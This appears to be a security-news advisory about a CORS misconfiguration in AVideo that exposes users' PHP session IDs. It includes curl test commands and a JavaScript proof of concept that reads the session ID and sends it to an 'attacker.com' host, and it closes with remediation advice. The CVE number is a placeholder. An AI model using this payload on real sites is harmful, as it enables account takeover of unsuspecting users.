AVideo, CORS Misconfiguration, CVE-2024-XXXXX (Critical)

Listen to this Post

The vulnerability lies in the file /objects/phpsessionid.json.php, which is accessible without any authentication. This endpoint is designed to return the current PHP session ID of the user. The issue is exacerbated by the `allowOrigin()` function, called from within this script, which handles Cross-Origin Resource Sharing (CORS) headers. This function, located in objects/functions.php, takes the `Origin` header from the incoming request and reflects it verbatim in the `Access-Control-Allow-Origin` response header. Crucially, it also sets Access-Control-Allow-Credentials: true. This configuration tells a web browser that it is acceptable to send cookies and other credentials (like the session cookie) to the server from any external domain specified in the `Origin` header. Consequently, an attacker can host a malicious website that, when visited by a logged-in AVideo user, makes a JavaScript `fetch` request to the vulnerable endpoint with the `credentials: ‘include’` option. The browser, abiding by the permissive CORS policy, will include the victim’s session cookie and allow the attacker’s script to read the response, which contains the session ID. With this valid session ID, the attacker can then impersonate the victim, leading to a complete account takeover.
Platform: AVideo
Version: (All Versions)
Vulnerability : Session Exposure
Severity: Critical
date: (Not Disclosed)

Prediction: Patch Immediately

What Undercode Say:

Analytics:

The root cause is a complete lack of CORS policy restrictions combined with an endpoint that leaks sensitive identifiers. This is not a complex injection flaw but a fundamental configuration error that completely bypasses the Same-Origin Policy. The `allowOrigin()` function treats the `Origin` header as a trusted input, which it never is. The presence of `Access-Control-Allow-Credentials: true` with a wildcard or reflected origin is a classic and critical misconfiguration, as it turns a feature for cross-origin requests into a weapon for data theft. The impact is maximized because the `phpsessionid.json.php` endpoint requires no authentication token or CSRF protection, operating solely on the session cookie which is precisely what it leaks.

Bash Commands & Analysis:

The vulnerability can be tested manually using `curl` to verify the insecure CORS configuration and data exposure.

1. Test the CORS misconfiguration by sending a request with a fake Origin.
Replace https://target-avideo.com with the actual target URL.
curl -H "Origin: https://evil.com" \
-H "Cookie: PHPSESSID=any_value" \
-I https://target-avideo.com/objects/phpsessionid.json.php
Expected insecure response headers:
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true
2. Directly exfiltrate the session ID (simulates the server's response).
This is what the attacker's script would see.
curl https://target-avideo.com/objects/phpsessionid.json.php

The response from the second `curl` command will be a JSON object similar to {"phpsessid":"victim_session_id"}.

How Exploit:

An attacker lures a logged-in AVideo user to a page they control. This page contains the following malicious JavaScript code:


<script>
// Make a fetch request to the vulnerable endpoint.
// 'include' forces the browser to send cookies.
fetch('https://TARGET/objects/phpsessionid.json.php', {
credentials: 'include'
})
.then(response => response.json()) // Parse the JSON response.
.then(data => {
// data.phpsessid now contains the victim's session ID.
// Send this stolen ID to the attacker's server.
document.location = 'https://attacker.com/steal?sid=' + data.phpsessid;
});
</script>

When the victim visits the page, their browser sends a request including the AVideo session cookie. The server, due to the CORS flaw, allows the attacker’s script to read the response and exfiltrate the session ID.

Protection from this CVE:

  1. Immediate Patch: Apply any official updates from the vendor (WWBN/AVideo) that address this issue. This likely involves removing the `phpsessionid.json.php` endpoint or adding authentication.
  2. Manual Code Fix: If a patch is unavailable, modify the code to remove the sensitive data exposure. The endpoint `/objects/phpsessionid.json.php` should be deleted or modified to require authentication and not expose the session ID.
  3. Correct CORS Configuration: The `allowOrigin()` function in `objects/functions.php` must be fixed. Instead of reflecting any origin, it should validate against a whitelist of trusted domains. If CORS is not strictly required for this endpoint, the headers `Access-Control-Allow-Origin` and `Access-Control-Allow-Credentials` should not be set at all.
  4. Network Level Protection: Deploy a Web Application Firewall (WAF) rule to block requests to `/objects/phpsessionid.json.php` that contain unexpected or suspicious `Origin` headers, or simply block access to this specific path entirely.

Impact:

Critical – Full Account Takeover. An unauthenticated, remote attacker can steal the session identifier of any user, including administrators, who visits a malicious webpage. This leads to a complete compromise of the victim’s account and all associated privileges, allowing the attacker to view private data, modify content, and potentially gain further access to the server.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top